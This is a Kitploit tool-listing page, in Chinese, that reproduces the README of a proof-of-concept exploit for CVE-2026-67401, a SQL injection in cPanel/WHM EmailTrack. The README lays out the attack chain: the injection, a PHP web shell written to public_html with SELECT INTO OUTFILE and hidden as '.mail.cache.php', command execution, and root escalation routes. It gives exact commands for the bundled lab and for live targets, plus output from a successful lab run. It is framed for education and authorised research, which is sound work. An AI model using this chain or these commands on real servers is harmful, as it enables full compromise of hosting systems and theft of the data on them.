Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-67401 — CVE-2026-67401 的概念验证,该漏洞是 cPanel/WHM EmailTrack 中的 SQL 注入,可实现任意文件写入和 root RCE,附带 SQLi 检测探针和一个自包含的易受攻击实验环境。 | Kitploit
工具/GitHubGitHub/imbas007/cve-2026-67401
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育实验室与实践
GitHubimbas007/cve-2026-67401

CVE-2026-67401

CVE-2026-67401 的概念验证,该漏洞是 cPanel/WHM EmailTrack 中的 SQL 注入,可实现任意文件写入和 root RCE,附带 SQLi 检测探针和一个自包含的易受攻击实验环境。

查看仓库
3小时59分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-67401 — cPanel/WHM EmailTrack SQL 注入 → Root RCE

CVE Severity Platform Python

针对 CVE-2026-67401 的概念验证,这是 cPanel & WHM 的 EmailTrack 功能中的一个严重 SQL 注入漏洞,允许拥有邮件相关权限的已认证用户写入任意文件并以 root 身份执行代码。

发现者: Ali Mustafa 披露日期: 2026 年 9 月 8 日 组件: EmailTrack(邮件投递日志记录 / 跟踪)


受影响版本

低于修复版本的版本均存在漏洞。

cPanel 构建系列修复版本
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

使用以下命令检查你的版本:

root@kitploit:~
cat /usr/local/cpanel/version

利用链

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. 使用拥有邮件权限的账户认证到 cPanel。
  2. 通过 EmailTrack 的 account 参数注入。
  3. 使用 SELECT ... INTO OUTFILE 将 PHP Web Shell 写入 public_html/。
  4. 通过该 Shell 执行命令。
  5. 通过 cPanel 的 SUID 二进制文件、cron 或任务队列提权。

仓库内容

文件描述
poc_sqli.pySQL 注入检测:基于布尔、基于时间以及 UNION 列数
poc_full_chain.py完整利用链:SQLi → INTO OUTFILE Web Shell → RCE → root 提权指引
lab/vuln_server.py易受攻击的 EmailTrack 后端的本地模拟(安全、自包含)
README.md本文档

捆绑的实验环境让你能够在没有真实 cPanel 服务器的情况下运行并验证整条利用链。


环境要求

  • Python 3.8+
  • 无需第三方包——所有内容均使用标准库。

使用方法

所有命令均从仓库根目录运行。

1. 运行本地实验环境

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • 凭据: alice / s3cr1t
  • 模拟: UAPI 登录、易受攻击的 EmailTrack 查询、SLEEP()、INTO OUTFILE 以及 PHP Web Shell 执行。
  • 参数 1: 端口(默认 18123)
  • 参数 2: 文档根目录(默认 lab/htdocs)

在一个终端中保持其运行,并使用第二个终端运行 PoC。

2. SQL 注入检测

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
参数描述
-H, --hostcPanel 主机,例如 https://cp.example.com:2083
-u, --username拥有邮件权限的 cPanel 账户
-p, --password账户密码
--param可注入参数(默认:account)
--modedetect(默认)、boolean、timing、union 或 all
--sleep时间探测的 SLEEP() 时长(默认:3.0)
--dump-version尝试通过 UNION 提取 DBMS 版本
--insecure跳过 TLS 证书验证

运行特定探测:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. 完整利用链

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
参数 / 环境变量描述
host(位置参数)cPanel 主机,或设置环境变量 CPANEL_HOST
CPANEL_USER拥有邮件权限的 cPanel 账户
CPANEL_PASS账户密码
--shell-base提供 public_html 服务的基础 URL(即访问 Web Shell 的地址)
--insecure跳过 TLS 证书验证
--no-escalate在 RCE 后停止;跳过 root 提权指引
SHELL_NAME(环境变量)Web Shell 文件名(默认:.mail.cache.php)

自动执行的阶段:

  1. 认证到 cPanel
  2. 确认 SQL 注入(布尔 + 基于时间)
  3. 通过 UNION 确定查询的列数
  4. 使用 SELECT ... INTO OUTFILE 写入 PHP Web Shell
  5. 通过该 Shell 执行命令(id、whoami、SUID 枚举……)
  6. 打印 root 提权指引(SUID whmapi1、cron、任务队列)

4. 针对真实目标

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

注意: 默认的 --shell-base 会从主机中去除仅用于 cPanel 的端口(2082/2083)。如果文档根目录通过不同端口提供服务,请显式设置。


已验证结果

针对捆绑实验环境产生的输出:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

参考资料

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

许可证

为教育和授权安全研究目的发布。 使用前请参阅免责声明。

下载工具